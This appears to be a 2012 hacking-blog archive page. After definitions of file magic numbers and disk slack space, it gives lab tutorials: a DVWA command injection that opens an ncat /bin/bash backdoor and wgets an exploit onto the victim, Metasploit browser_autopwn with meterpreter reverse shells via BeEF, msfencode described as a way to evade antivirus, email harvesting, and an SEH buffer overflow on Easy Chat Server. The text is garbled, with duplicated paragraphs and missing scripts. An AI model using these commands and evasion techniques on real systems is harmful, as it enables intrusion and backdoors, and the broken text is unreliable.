A magic number is a number embedded at or near the beginning of a file that indicates its file format (i.e., the type of file it is). It is also sometimes referred to as a file signature. Magic numbers are generally not visible to users. However, they can easily be seen with the use of a hex editor, which is a specialized program that shows and allows modification of every byte in a file. For common file formats, the numbers conveniently represent the names of the file types. Thus, for example, the magic number for image files conforming to the widely used GIF87a format in hexadecimal (i.e., base 16) terms is 0x474946383761, which when converted into ASCII is GIF87a. ASCII is the de facto standard used by computers and communications equipment for character encoding (i.e., associating alphabetic and other characters with numbers). Likewise, the magic number for image files having the subsequently introduced GIF89a format is 0x474946383961. For both types of GIF (Graphic Interchange Format) files, the magic number occupies the first six bytes of the file. They are then followed by additional general information (i.e., metadata) about the file. Similarly, a commonly used magic number for JPEG (Joint Photographic Experts Group) image files is 0x4A464946, which is the ASCII equivalent of JFIF (JPEG File Interchange Format). However, JPEG magic numbers are not the first bytes in the file; rather, they begin with the seventh byte. Additional examples include 0x4D546864 for MIDI (Musical Instrument Digital Interface) files and 0x425a6831415925 for bzip2 compressed files. Magic numbers are not always the ASCII equivalent of the name of the file format, or even something similar. For example, in some types of files they represent the name or initials of the developer of that file format. Also, in at least one type of file the magic number represents the birthday of that format's developer. Various programs make use of magic numbers to determine the file type. Among them is the command line (i.e., all-text mode) program named file, whose sole purpose is determining the file type. Although they can be useful, magic numbers are not always sufficient to determine the file type. The main reason is that some file types do not have magic numbers, most notably plain text files, which include HTML (hypertext markup language), XHTML (extensible HTML) and XML (extensible markup language) files as well as source code. Fortunately, there are also other means that can be used by programs to determine file types. One is by looking at a file's character set (e.g., ASCII) to see if it is a plain text file. If it is determined that a file is a plain text file, then it is often possible to further categorize it on the basis of the start of the text, such as <html> for HTML files and #! (the so-called shebang) for script (i.e., short program) files. Another way to determine file types is through the use of filename extensions (e.g., .exe, .html and .jpg), which are required on the various Microsoft operating systems but only to a small extent on Linux and other Unix-like operating systems. However, this approach has the disadvantage that it relatively easy for a user to accidentally change or remove the extensions, in which case it becomes difficult to determine the file type and use the file. Still another way that is possible in the case of some commonly used filesystems is through the use of file type information that is embedded in each file's metadata. In Unix-like operating systems, such metadata is contained in inodes, which are data structures (i.e., efficient ways of storing information) that store all the information about files except their names and their actual data. |
Minggu, 18 Maret 2012
Magic Number - Definition
Slack Space - Definition
Slack space is a form of internal fragmentation, i.e. wasted space, on a
hard disk. When a file is written to disk it’s stored at the
“beginning” of the cluster. A cluster is defined as a collection of
logically contiguous sectors and the smallest amount of disk space that
can be allocated to hold a file. Rarely will there be an even match
between the space available in a cluster (or collection of clusters for
longer files) and the number of bytes in the file. Left over bytes in
the cluster are unused, hence the name slack space.
Unallocated Space - Definition
Unallocated Space is available disk space that is not allocated to any
volume. The type of volume that you can create on unallocated space
depends on the disk type. On basic disks, you can use unallocated space
to create primary or extended partitions. On dynamic disks, you can use
unallocated space to create dynamic volumes.
Senin, 05 Maret 2012
DVWA-Web Hacking Medium Level
And this condition, i will hacking website with command execution. We use nc to create backdoor to DVWA.
we use | ncat -l-p 5555 -e '/bin/bash' to create backdoor
we try nc and use ls to listening file
root@bt:~# nc 127.0.0.1 5555
ls
help
index.php
php-backdoor.php
php-backdoor.php.1
php-backdoor.php.2
source
we use pwd to see position, i change directory to /tmp after that i use ls to listening file.
pwd
/var/www/dvwa/vulnerabilities/exec
cd /tmp
ls
VMwareDnD
gpg-oRkFC9
kde-root
ksocket-root
orbit-root
pulse-sRwpC5iUzahE
serverauth.931hzqFniM
ssh-guIVrZ1662
vmware-root
i use wget to download file 18411.c to victim. After that i see again with ls and file 18411.c not found in file ls.
ls
VMwareDnD
gpg-oRkFC9
kde-root
ksocket-root
orbit-root
pulse-sRwpC5iUzahE
serverauth.931hzqFniM
ssh-guIVrZ1662
vmware-root
ls -lia
total 60
2752513 drwxrwxrwt 13 root root 4096 Mar 6 03:52 .
2 drwxr-xr-x 28 root root 4096 Mar 6 02:09 ..
2756082 drwxrwxrwt 2 root root 4096 Mar 6 02:29 .ICE-unix
2756089 -r--r--r-- 1 root root 11 Mar 6 02:08 .X0-lock
2756081 drwxrwxrwt 2 root root 4096 Mar 6 02:08 .X11-unix
2756104 drwx------ 2 root root 4096 Mar 6 02:28 .org.chromium.muUsCf
2756083 drwxrwxrwt 2 root root 4096 Mar 6 02:07 VMwareDnD
2756094 drwx------ 2 root root 4096 Mar 6 02:08 gpg-oRkFC9
2756096 drwx------ 2 root root 4096 Mar 6 03:20 kde-root
2756097 drwx------ 2 root root 4096 Mar 6 04:49 ksocket-root
2756172 drwx------ 2 root root 4096 Mar 6 04:37 orbit-root
2756111 drwx------ 2 root root 4096 Mar 6 02:08 pulse-sRwpC5iUzahE
2756092 -rw------- 1 root root 141 Mar 6 02:08 serverauth.931hzqFniM
2756091 drwx------ 2 root root 4096 Mar 6 02:08 ssh-guIVrZ1662
2756084 drwx------ 2 root root 4096 Mar 6 02:07 vmware-root
Senin, 27 Februari 2012
Example use beef metasploit
In this season i will explain how to use beef, before you paractical beef-ng application you must open beef-ng application on backtrack > exploitation tool > social engineering tool > Beff xss exploitation
copy file ui/panel and paste on web browser
fill the username and password beef
copy file ui/panel and paste on web browser
fill the username and password beef
Open terminal and running metasploit
root@bt:~# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 47 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 47 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
Type "search browser" to find modul for auxiliary
msf > search browser
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/dos/windows/browser/ms09_065_eot_integer 2009-11-10 normal Microsoft Windows EOT Font Table Directory Integer Overflow
auxiliary/dos/windows/smb/ms11_019_electbowser manual Microsoft Windows Browser Pool DoS
auxiliary/gather/android_htmlfileprovider normal Android Content Provider File Disclosure
auxiliary/scanner/http/lucky_punch normal HTTP Microsoft SQL Injection Table XSS Infection
auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter
Use "auxiliary/server/browser/_autopown" and type show options to see module options
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Setting LHOST and see result on module options
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
Setting PAYLOAD_WIN32 and JAVA after that type exploit to see result
msf auxiliary(browser_autopwn) > set PAYLOAD_WIN32
PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set PAYLOAD_JAVA
PAYLOAD_JAVA => java/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2012-03-01 00:38:25 +0700
msf auxiliary(browser_autopwn) > [*] Done in 4.42241719 seconds
Result on exploitation you can see "local ip" it use to exploitation with beef
[*] Using URL: http://0.0.0.0:8080/NWUmoPCg
[*] Local IP: http://192.168.182.3:8080/NWUmoPCg
[*] Server started.
Open again beef-ng on browser
click Command > Network > JBoss, fill the blank as this below. click execute!.
Now see computer victim, browser victim is crash
Open again terminal and type "seassons -l"
Last type "seassons -i 1" and now seen Meterpreter
msfencode and msfpayload definition (update)
- Msfencode is another included in the Metasploit framework and is used to encode an exploit or payload. In many cases, basic exploits can be detected by virus scanners, but by encoding them we have a better chance of by passing their detection routines and ensuring that our payload get executes on the target system. In addition, recent updates to msfencode also allow us to encode a payload into an existing executable! This mean you can take the normal application, encode it with our payload, and end up with an encoded copy of the executable containing the payload and ready to run thr target system. This goes very well with the concepts that we've talked about with custom malware where an actual usable program is sent to the target but our malware is sent with it.
to use msf encode you must open terminal and type
- #msfencode -l
to use msf encode you must open terminal and type
- #msfencode -l
change directory to msf3 after that one of the easiest ways to use msfencode is to just directly pipe the output from msfpayload to it. After you determine which encoding method you want to use, you then determine which format you want to receive the result in similiar to msypayload. for example, we will use the x86/shikata_ga_nai encoder and output to another executable. the result is
- msfpayload is component of metaspolit alllows to generate shellcode, executable, and much more for use in exploit outside of the framework. Shellcode can be generated in many formats including C, Ruby , JavaScript, and even Visual basic for Application. Each output format will be useful in various situations.
To use msf encode you must open terminal and type
- #msfconsole -l
Type scrpit this below to listening and determining payload
SE and SET definition
SE (Social Engineering) trick conducted by a hacker/cracker to fool the victim to want to do something.
SET (Social Engineering Toolkit) is specifically designed to perform advanced attacks againts the human element. Originally this tool was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration tester arsenal. SET was written by David Kennedy and a with a lot of help from the community in incorporating attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted an focused attacks againts a person or organization used during a penetration test.
SET (Social Engineering Toolkit) is specifically designed to perform advanced attacks againts the human element. Originally this tool was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration tester arsenal. SET was written by David Kennedy and a with a lot of help from the community in incorporating attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted an focused attacks againts a person or organization used during a penetration test.
Use auxilary metasploit (update)
Open the terminal and type msfconsole
Type this commend below to use the email collector we've been added before
We type "show Auxiliary" to see auxiliary
Type this commend below to use the email collector we've been added before
We type "show Auxiliary" to see auxiliary
We use "auxiliary/gather/search_email_collector" and we type "show options" to see parameters can we use
msf > use gather/search_email_collector
msf auxiliary(search_email_collector) > show options
Module options (auxiliary/gather/search_email_collector):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The domain name to locate email addresses for
OUTFILE no A filename to store the generated email list
SEARCH_BING true yes Enable Bing as a backend search engine
SEARCH_GOOGLE true yes Enable Google as a backend search engine
SEARCH_YAHOO true yes Enable Yahoo! as a backend search engine
We use Domain to search email y**oo
There it is the email address for the specified domain. There are only example for auxiliary metasploit.
Jumat, 24 Februari 2012
Linux Exploitation
Before Exploitation Linux we must turn off ASLR with this step
Type script this below
Running the aplication with gdb
overwrite EIP with give sending data fuzzing
Type here for more info register eip
Type on below to see entrance stack application, and look register esp
Running sc_generator to find Shellcode
Insert Shellcode into the fuzzer and exploit linux like this below
Type script this below
Running the aplication with gdb
overwrite EIP with give sending data fuzzing
Type here for more info register eip
Type on below to see entrance stack application, and look register esp
Running sc_generator to find Shellcode
Insert Shellcode into the fuzzer and exploit linux like this below
Rabu, 22 Februari 2012
Buffer Overflow easy chat server "seh and safeseh"
first i want to search vulnerability "easy chat server" i choose wireshark to sniffing packet data on easy server. Before i try to use wireshark, i play easy chat server with web browser. Iam register easy chat server.
I want to login easy with server, and i choose frinds to chat with me
Run wireshark to sniffing packet data on easy chat server. I see packet data on easy chat sever with ip 192.168.56.101.
I type source for fuzzing on wireshark. I build fuzzing this below :
Run easy chat server after that OllyDbg, klik view > attack, search easy chat server > attack.
This file is crash, however register EIP no crushed of buffer to sending. Because this application use seh. Fot view to seh, choose view > SEH Chain.
Now EIP value to be 41414141
To view data inside the application memory, right click line stack 3 > follow in dump. Then on the left of the memory window seen in the data buffer memory.
copying file ssleay32.dll in system backtrack to search whether this file contain seh.
Open terminal and enter the metasploit. type ./msfpescan -p /tmp/ssleay32.dll. Try module to have file ssleay32.dll on SEH Chain.
Double click SSLEAY32.dll, right click > search for > sequence of command. After that windows search is appear, type POP r32, POP r32, RETN, click find
Now OllyDbg has found address memory in the SSLEAY32.dll.
Open terminla and search ./pattern_create.rb
Copy pattern_create.rb into script and run script again. easy chat server has been crash. Note value at EIP.
Open terminal and search pattern_offset with value contained in the EIP
Type script this below :
Script sucessfully executed, buffer value \x41 success entry into SEH handler
Type script below to enter address msfpescan from SSLEAY32.dll
See that the process has break by OllyDbg exactly when it will access the address SSLEAY32.dll
looking into SE Chain
looking into SE Chain
push shift + f9 to countinue prosses in memory SSLEAY32.dll
Open web browser and type localhost with port 5555. Now at the Metasploit, choose payload search os :: win32, after that choose again Windows bind shell
and a know this payload any bad character. Iam reply to build payload with how to clean bad character "\x20\x25\x0a\x0d\x08\x80\x32\x6e\x3f"
Copy payload into script fuzzer
Run the script
See the result, easy chat server is crash
Access telnet with terminal. Now exploit is success....
Langganan:
Postingan (Atom)